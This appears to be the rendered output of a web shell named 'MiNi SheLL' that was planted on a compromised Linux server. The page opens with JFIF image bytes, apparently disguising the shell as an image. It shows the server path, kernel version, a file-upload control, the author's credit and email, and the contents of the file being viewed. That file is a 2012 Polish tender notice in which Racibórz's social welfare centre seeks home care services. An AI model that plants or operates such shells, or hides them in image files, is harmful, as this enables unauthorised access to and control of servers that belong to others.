JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121123/468520-N-2012.html

<p class="kh_header"><b>Racibórz: ŚWIADCZENIE USŁUG OPIEKUŃCZYCH I SPECJALISTYCZNYCH USŁUG OPIEKUŃCZYCH NA TERENIE MIASTA RACIBORZA</b><br>
<b>Numer ogłoszenia: 468520 - 2012; data zamieszczenia: 23.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Sienkiewicza 1, 47-400 Racibórz, woj. śląskie, tel. 032 4152650, faks 032 4190659.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bipraciborz.pl/ops/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG OPIEKUŃCZYCH I SPECJALISTYCZNYCH USŁUG OPIEKUŃCZYCH NA TERENIE MIASTA RACIBORZA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia w przetargu nieograniczonym jest: 
  1.1 Świadczenie usług opiekuńczych i specjalistycznych usług opiekuńczych na terenie miasta  Raciborza
   1.2  Pobieranie odpłatności od podopiecznych
   1.3  Szacunkowa ilość godzin od 1.01.2013-31.10.2013 
1) usługi opiekuńcze -                                                                             16000   godzin  
2) usługi specjalistyczne -                                                                            400  godzin 
             3) usługi specjalistyczne dla osób z zaburzeniami psychicznymi                      1760   godzin
1.4 Zamawiający zastrzega sobie prawo zmniejszenia ilości godzin z uwagi na zmianę okoliczności  
      uzasadniających przyznanie świadczenia klientom  w formie usług opiekuńczych.
1.5 Godzina usługi tj.60 min. liczona jest jako faktycznie przepracowany  czas w domu z klientem,   
      bez czasu dojazdu lub dojścia do miejsca zamieszkania podopiecznego. 

2.Zakres usług opiekuńczych obejmuje:
     2.1 Zaspokajanie codziennych potrzeb życiowych, a w szczególności:
1)	utrzymanie czystości w pomieszczeniach osoby wymagającej opieki, a  zwłaszcza: mycie okien, ścieranie kurzu, wynoszenie śmieci, wycieranie podłóg ,zmywanie naczyń, porządkowanie szaf  (wg  życzenia podopiecznego),
2)	dostarczanie opału i utrzymanie ciepła w pomieszczeniu,
3)	zakup  art. spożywczych,  higieniczno-sanitarnych,  leków   i   innych    potrzebnych w gospodarstwie  domowym,
4)	przygotowanie posiłków z uwzględnieniem diety (zapewnienie jednego gorącego posiłku  w ciągu dnia) pomoc przy spożywaniu posiłków,
5)	pranie odzieży, bielizny  pościelowej, firany itp.
       2.2Zaspokajanie potrzeb zdrowotnych .
1)	zabiegi higieniczno-sanitarne , a w szczególności :
a)	mycie i kąpiel chorego,
b)	przesłanie łóżka,
c)	układanie chorego w łóżku,
d)	pomoc przy załatwianiu potrzeb fizjologicznych,
e)	zapobieganie powstawaniu odleżyn i odparzeń,
f)	podawanie leków doustnych ,obserwacja  efektów działania leków,
g)	udzielanie pierwszej pomocy w przypadkach nagłych i zagrażających życiu podopiecznego.
       2.3 Pomoc w załatwianiu spraw administracyjno-urzędowych .
       2.4 Pomoc w podtrzymywaniu psychofizycznej kondycji osoby w tym:
1)	podtrzymywanie indywidualnych zainteresowań,
2)	organizowanie i podtrzymywanie kontaktów sąsiedzkich,
3)	organizowanie spacerów, czytanie.

      3.Zakres specjalistycznych usług opiekuńczych obejmuje :
3.1 Uczenie i rozwijanie umiejętności niezbędnych do samodzielnego życia, w tym zwłaszcza:  
1)	kształtowanie umiejętności zaspokajania podstawowych potrzeb życiowych i umiejętności społecznego funkcjonowania, motywowanie do aktywności, leczenia i rehabilitacji, prowadzenie treningów umiejętności samoobsługi i umiejętności społecznych oraz wspieranie, także w formie asystowania w codziennych czynnościach życiowych, w szczególności takich jak:  
a)	samoobsługa, zwłaszcza wykonywanie czynności gospodarczych i porządkowych, w tym umiejętność utrzymania i prowadzenia domu, 
b)	dbałość o higienę i wygląd, 
c)	utrzymywanie kontaktów z domownikami, rówieśnikami, w miejscu nauki i pracy oraz ze społecznością lokalną, 
d)	wspólne organizowanie i spędzanie czasu wolnego, 
e)	korzystanie z usług różnych instytucji, 
2)	interwencje i pomoc w życiu w rodzinie, w tym:  
a)	pomoc w radzeniu sobie w sytuacjach kryzysowych - poradnictwo specjalistyczne, interwencje kryzysowe, wsparcie psychologiczne, rozmowy terapeutyczne, 
b)	ułatwienie dostępu do edukacji i kultury, 
c)	doradztwo, koordynacja działań innych służb na rzecz rodziny, której członkiem jest osoba uzyskująca pomoc w formie specjalistycznych usług, 
d)	kształtowanie pozytywnych relacji osoby wspieranej z osobami bliskimi, 
e)	współpraca z rodziną - kształtowanie odpowiednich postaw wobec osoby chorującej, niepełnosprawnej, 
3)	pomoc w załatwianiu spraw urzędowych, w tym:  
a)	w uzyskaniu świadczeń socjalnych, emerytalno-rentowych, 
b)	w wypełnieniu dokumentów urzędowych, 
4)	wspieranie i pomoc w uzyskaniu zatrudnienia, w tym zwłaszcza:  
a)	w szukaniu informacji o pracy, pomoc w znalezieniu zatrudnienia lub alternatywnego zajęcia, w szczególności uczestnictwo w zajęciach warsztatów terapii zajęciowej, zakładach aktywności zawodowej, środowiskowych domach samopomocy, centrach i klubach integracji społecznej, klubach pracy, 
b)	w kompletowaniu dokumentów potrzebnych do zatrudnienia, 
c)	w przygotowaniu do rozmowy z pracodawcą, wspieranie i asystowanie w kontaktach z pracodawcą, 
d)	w rozwiązywaniu problemów psychicznych wynikających z pracy lub jej braku, 
5)	pomoc w gospodarowaniu pieniędzmi, w tym:  
a)	nauka planowania budżetu, asystowanie przy ponoszeniu wydatków, 
b)	pomoc w uzyskaniu ulg w opłatach, 
c)	zwiększanie umiejętności gospodarowania własnym budżetem oraz usamodzielnianie finansowe.

3.2  Pielęgnacja - jako wspieranie procesu leczenia, w tym:  
1)	pomoc w dostępie do świadczeń zdrowotnych, 
2)	uzgadnianie i pilnowanie terminów wizyt lekarskich, badań diagnostycznych, 
3)	pomoc w wykupywaniu lub zamawianiu leków w aptece, 
4)	pilnowanie przyjmowania leków oraz obserwowanie ewentualnych skutków ubocznych ich stosowania, 
5)	w szczególnie uzasadnionych przypadkach zmiana opatrunków, pomoc w użyciu środków pomocniczych i materiałów medycznych, przedmiotów ortopedycznych, a także w utrzymaniu higieny, 
6)	pomoc w dotarciu do placówek służby zdrowia, 
7)	pomoc w dotarciu do placówek rehabilitacyjnych.

3.3	Rehabilitacja fizyczna i usprawnianie zaburzonych funkcji organizmu w zakresie nieobjętym przepisami ustawy z dnia 27 sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych (tj.Dz. U.2008 r, Nr 164, poz. 1027, z późn. zm.):  
1)	zgodnie z zaleceniami lekarskimi lub specjalisty z zakresu rehabilitacji ruchowej lub fizjoterapii, 
2)	współpraca ze specjalistami w zakresie wspierania psychologiczno-pedagogicznego i edukacyjno-terapeutycznego zmierzającego do wielostronnej aktywizacji osoby korzystającej ze specjalistycznych usług.

3.4  Pomoc mieszkaniowa, w tym:  
1)	w uzyskaniu mieszkania, negocjowaniu i wnoszeniu opłat, 
2)	w organizacji drobnych remontów, adaptacji, napraw, likwidacji barier architektonicznych, 
3)	kształtowanie właściwych relacji osoby uzyskującej pomoc z sąsiadami i gospodarzem domu; 

3.4	Zapewnienie dzieciom i młodzieży z zaburzeniami psychicznymi dostępu do zajęć rehabilitacyjnych i rewalidacyjno-wychowawczych, w wyjątkowych przypadkach, jeżeli nie mają możliwości uzyskania dostępu do zajęć, o których mowa w art.7 ustawy z dnia 19 sierpnia 1994 r. o ochronie zdrowia psychicznego (tj.Dz. U. 2011r. Nr 231, poz. 1375, z późn. zm. ).

4.Zakres świadczonej pomocy będzie ustalony indywidualnie dla każdego podopiecznego, na podstawie zaleceń lekarza wynikających z rodzaju schorzenia lub niepełnosprawności oraz przeprowadzonego przez pracownika socjalnego wywiadu środowiskowego.

5.Realizacja zlecenia następuje na podstawie przekazanej Usługodawcy listy osób objętych świadczeniem w formie usług opiekuńczych i specjalistycznych usług opiekuńczych, określającej miejsce realizacji usługi, czas jej trwania, zakres usług i % odpłatności. 

6.Zamawiający w uzasadnionych przypadkach będzie zlecał  wykonywanie usług łącznie tj: usługi podstawowe i specjalistyczne usługi opiekuńcze u jednego podopiecznego. 

7.W zależności od potrzeb usługi świadczone będą od poniedziałku do niedzieli w godzinach od 6.00- 22.00 wg zasad ustalonych w pkt.4

8.Wykonawca zobowiązany jest do : 
1)	zapewnienia wykonania poszczególnych typów usług przez osoby 
z właściwym danemu typowi usługi przygotowaniem zawodowym,
2)	zgłaszania niezwłocznie telefonicznie istotnych  utrudnień w wykonywaniu pracy,  a spowodowanych  przez klienta , 
3)	zgłaszania na piśmie  wszystkich sytuacji związanych z zaprzestaniem świadczenia usługi w tym również z tytułu zgonu klienta, 
4)	do prowadzenia indywidualnych kart pracy w których  wpisuje ilość faktycznie wykonanych godzin potwierdzonych podpisem klienta lub członka rodziny, zamieszcza informacje  o przeszkodach w wykonaniu usług , 
5)	zachowania tajemnicy zawodowej w zakresie informacji na temat danych osób korzystających z usług, w tym nie ujawniania informacji, że dana osoba jest klientem Zamawiającego.
6)	podejmowania czynności związanych ze świadczeniem usługi bez względu na stopień zaniedbania środowiska w ciągu 24 godzin od chwili zgłoszenia o potrzebie ich zapewnienia, a w przypadku nagłym  niezwłocznie po otrzymaniu zgłoszenia,
7)	pouczenia pracowników o zakazie:  palenia tytoniu,  wprowadzaniu osób postronnych i zwierząt do miejsca wykonywania usług,
8)	zapewnienia osobom wykonującym usługi wyposażenie w odpowiednie ubranie ochronne dostosowane do zakresu niesionej pomocy ( rękawiczki, fartuchy itp.)

10. Rozliczenie za świadczone usługi odbywa się co miesiąc na podstawie- karty pracy potwierdzonej podpisem klienta, w której Wykonawca wpisuje ilość faktycznie wykonanych godzin, zamieszcza informacje  o przeszkodach w wykonaniu usług.

11.	Wykonawca zobowiązany jest do pobierania odpłatności za pokwitowaniem od podopiecznego za usługi opiekuńcze, specjalistyczne usługi opiekuńcze , specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi, z dołu, do 5-go każdego następnego miesiąca, zgodnie z dokumentacją potwierdzającą ilość godzin faktycznie zrealizowanych przez wykonawcę usług.
12. Zgodnie z ustawą o ochronie danych osobowych Wykonawca zobowiązany będzie do zawarcia odrębnej  umowy powierzenia danych osobowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje udzielenie zamówień uzupełniających, o których mowa w art.67 ust.1 pkt.6  u. o p.z.p.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.24.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje szczegółowego opisu warunku i sposobu oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spelniony jeśli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonywał lub wykonuje co najmniej dwie różne umowy przez okres 12 miesięcy polegające na świadczeniu usług opiekuńczych o  wartości 250.000 zł brutto każda oraz co najmniej dwie różne umowy przez okres 12 m-cy każda, polegające na świadczeniu usług opiekuńczych dla osób z zaburzeniami psychicznymi przez osoby ze specjalistycznym przygotowaniem zawodowym o  wartości co najmniej  25.000,- zł brutto każda,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje szczegółowego opisu warunku i sposobu oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje:
1)	co najmniej 8 osobami posiadającymi kwalifikacje do wykonywania zawodu pielęgniarki lub opiekunki środowiskowej, 
2)	co najmniej 1 osobą posiadająca kwalifikacje terapeuty lub pedagoga lub psychologa lub rehabilitanta,
3)	co najmniej 3 osobami posiadającymi kwalifikacje do wykonywania specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi ,
     Ponadto każda z w/w osób świadczących specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi winna legitymować się, co najmniej półrocznym stażem pracy w jednej z następujących jednostek: szpitalu psychiatrycznym, jednostce organizacyjnej pomocy społecznej dla osób z zaburzeniami psychicznymi, placówce terapii lub placówce oświatowej, do której uczęszczają dzieci z zaburzeniami rozwoju lub upośledzeniem umysłowym, ośrodku terapeutyczno-edukacyjno-wychowawczym, zakładzie rehabilitacji, innej jednostce niż wymienione powyżej, świadczącej specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje szczegółowego opisu warunku i sposobu oceny spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniony i podpisany Formularz ofertowy ( Załącznik Nr1 do SIWZ)
Oraz -jeżeli dotyczą:
2)Dokument/y stwierdzające ustanowienie pełnomocnika zgodnie z art.23 ust.2 ustawy Prawo zamówień publicznych, w przypadku gdy o udzielenie niniejszego zamówienia Wykonawcy ubiegają się wspólnie - oryginał lub kopia poświadczenia za zgodność z oryginałem przez notariusza,
 3)pełnomocnictwo do działania w imieniu Wykonawcy, jeżeli do reprezentowania Wykonawcy   wskazano inną osobę niż upoważniona z mocy prawa- oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza lub innego dokumentu, z którego wynika upoważnienie do reprezentowania Wykonawcy 
4)pisemne zobowiązania innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.( treść dokumentu musi zawierać między innymi następujące informacje kto udziela, komu udziela, jakie zasoby udziela, tytuł prawny pod jakim potencjał zostanie udostępniony, wskazanie okresu na jaki zostaną  udostępnione zasoby)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art.144 ustawy Prawo zamówień publicznych Zamawiający zastrzega sobie prawo dokonywania zmian w postanowieniach zawartej umowy dotyczącej:
1)Przekształcenia firmy, zmiana brzmienia nazwy, zmiana osoby upoważnionej
   ( spisanie aneksu do umowy z uwzględniającego dokonanie przekształcenia firmy, )
2) zmiany osoby/osób wykonujących usługi opiekuńczena inne osoby, które spełniają warunek zawarty w postępowaniu przetargowym § 7 pkt.3 SIWZ- Wykonawca zobowiązany jest złożyć wniosek o zamianę osoby  - spisanie Aneksu  do załącznika nr 1 umowy .
3) Zmiany mające wpływ na wysokość wynagrodzenia: zmiana ustawowa podatku VAT.   (spisanie aneksu do umowy )</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.ops.bipraciborz.pl/index.php?id=110&typ=1<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej ul. Sienkiewicza 1, 47-400 Racibórz , II piętro pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2012 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej ul. Sienkiewicza 1, 47-400 Racibórz , SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com